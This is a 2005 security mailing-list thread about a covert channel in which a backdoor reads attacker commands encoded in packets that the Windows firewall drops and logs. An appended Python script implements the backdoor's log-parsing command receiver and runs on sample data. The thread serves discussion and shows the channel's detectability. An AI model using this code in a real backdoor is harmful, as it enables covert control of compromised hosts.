
Re: [Full-disclosure] Interesting idea for a covert channel or I just didn't research enough?



Bit noisy, I think.

-----Original Message-----
From: "PASTOR ADRIAN" <M123303@xxxxxxxxxxxxxx>
To: <full-disclosure@xxxxxxxxxxxxxxxxx>
Date: Thu, 6 Oct 2005 10:06:24 +0100
Subject: [Full-disclosure] Interesting idea for a covert channel or I just didn't research enough?

> Some time ago I thought of the following idea for a covert channel. Although 
> the idea of covert channels is *not* new at all, I couldn't find anything in 
> Google related to the following method of implementing a covert channel.
>  
> The scenario is the following. The victim is a host with a host-level 
> firewall which is blocking *all* incoming traffic. Somehow the attacker still 
> needs to communicate with a backdoor planted in this host. Use a reverse 
> shell and job done, you might say.
> 
> Actually, there is another way which I thought would be more creative (IMHO). 
>  
> It works like this: the backdoor enables logging in the host-level firewall 
> for all dropped packets, say Windows XP SP2 Firewall. Then the backdoor 
> receives commands from the attacker by interpreting the properties of the 
> dropped packets which were logged by the firewall. In other words, the 
> backdoor is constantly reading the logs and parsing commands which were sent 
> by the attacker embedded in packets which are being dropped (but logged) by 
> the firewall.
> 
> attacker sends packets -> packets are dropped by firewall -> packets 
> properties are captured in logs  -> backdoor reads logs and finds encoded 
> commands -> commands are executed 
> 
> Now, the way the backdoor would reply to the victim is really up to you. 
> One method that comes to my mind is posting the responses to a PHP 
> script which is located on some free-hosting webpage. The attacker would then 
> access this webpage.
>  
> Please, if you know anything related to backdoors intercepting commands from 
> log files, send me some links. Ideas, comments and flames are more than 
> welcome :-) .
> 
> Regards,
> pagvac (Adrian Pastor)
> Earth, SOLAR SYSTEM
> www.adrianpv.com
> www.ikwt.com (In Knowledge We Trust)
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
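The log-reading side of the channel Adrian describes, written out as an added example; this is editor-supplied code, not code from the original post or from any real backdoor. It assumes the W3C field layout that the Windows XP SP2 firewall writes to pfirewall.log (the "#Fields:" header line below), and it assumes a hypothetical encoding that the post does not specify: the attacker sends one TCP SYN per command byte, the source port carries a sequence number, the destination port carries the byte value, and a reserved destination port terminates a command. The IP addresses are documentation ranges and the log text is constructed sample data, so the block runs offline.

```python
import random

# W3C field list that Windows Firewall (XP SP2) writes to pfirewall.log.
FIELDS = ("date time action protocol src-ip dst-ip src-port dst-port size "
          "tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path").split()

# Hypothetical encoding (assumed here, not stated in the post): src-port carries
# a sequence number, dst-port carries one command byte, END_PORT ends a command.
BASE_SEQ = 40000
BASE_PORT = 10000
END_PORT = 9999

LOG_HEADER = (
    "#Version: 1.5\n"
    "#Software: Microsoft Windows Firewall\n"
    "#Time Format: Local\n"
    "#Fields: " + " ".join(FIELDS) + "\n"
)


def drop_line(src_ip, dst_ip, src_port, dst_port, proto="TCP",
              when="2005-10-06 10:06:24"):
    """One DROP entry in pfirewall.log layout (constructed sample, not real output)."""
    flags = "S" if proto == "TCP" else "-"
    return (f"{when} DROP {proto} {src_ip} {dst_ip} {src_port} {dst_port} "
            f"48 {flags} 1234567 0 65535 - - - RECEIVE")


def encode_command(cmd, attacker_ip, victim_ip, seq_start=0):
    """Attacker side: the log lines the firewall would write for the dropped SYNs
    that carry `cmd`, one byte per packet plus one terminator packet.
    Returns (lines, next_seq) so several commands can share one sequence space."""
    lines = []
    seq = seq_start
    for b in cmd.encode("latin-1"):
        lines.append(drop_line(attacker_ip, victim_ip, BASE_SEQ + seq, BASE_PORT + b))
        seq += 1
    lines.append(drop_line(attacker_ip, victim_ip, BASE_SEQ + seq, END_PORT))
    return lines, seq + 1


def parse_log(text):
    """Parse pfirewall.log text into dicts; '#' header lines and lines with the
    wrong field count are skipped."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != len(FIELDS):
            continue
        entries.append(dict(zip(FIELDS, parts)))
    return entries


def extract_commands(entries, attacker_ip):
    """Backdoor side: recover commands from DROP entries sent by attacker_ip.
    Entries may appear in any order, so bytes are reassembled by sequence
    number (src-port) and split at the terminator port. Unrelated drops
    (other hosts, other protocols, ports outside the encoding) are ignored."""
    by_seq = {}
    for e in entries:
        if (e["action"], e["protocol"], e["src-ip"]) != ("DROP", "TCP", attacker_ip):
            continue
        seq = int(e["src-port"]) - BASE_SEQ
        port = int(e["dst-port"])
        if seq < 0:
            continue
        if port == END_PORT:
            by_seq[seq] = None
        elif BASE_PORT <= port < BASE_PORT + 256:
            by_seq[seq] = port - BASE_PORT
    commands, buf = [], bytearray()
    for seq in sorted(by_seq):
        if by_seq[seq] is None:
            commands.append(buf.decode("latin-1"))
            buf = bytearray()
        else:
            buf.append(by_seq[seq])
    return commands


def build_sample_log(attacker_ip="198.51.100.7", victim_ip="192.0.2.10"):
    """Constructed sample log: two encoded commands mixed with ordinary
    background drops, then shuffled to imitate out-of-order logging."""
    c1, nxt = encode_command("whoami", attacker_ip, victim_ip)
    c2, _ = encode_command("ipconfig /all", attacker_ip, victim_ip, seq_start=nxt)
    noise = [
        drop_line("203.0.113.5", victim_ip, 3321, 445),                  # SMB probe
        drop_line("203.0.113.9", victim_ip, 1025, 10065, proto="UDP"),   # in-range port, wrong proto
        drop_line(attacker_ip, victim_ip, 51234, 135),                   # attacker, outside encoding
    ]
    lines = c1 + c2 + noise
    random.Random(1).shuffle(lines)
    return LOG_HEADER + "\n".join(lines) + "\n"


if __name__ == "__main__":
    log = build_sample_log()
    print(extract_commands(parse_log(log), "198.51.100.7"))
```

Running the block decodes ["whoami", "ipconfig /all"] from the 24 logged drops. The cost is visible in the sample: a 13-byte command needs 14 dropped, logged packets from the same source, each a SYN to an odd high port, which is the "noisy" part of the reply above; anyone reviewing the drop log, or counting drops per source, sees the channel as plainly as the backdoor does.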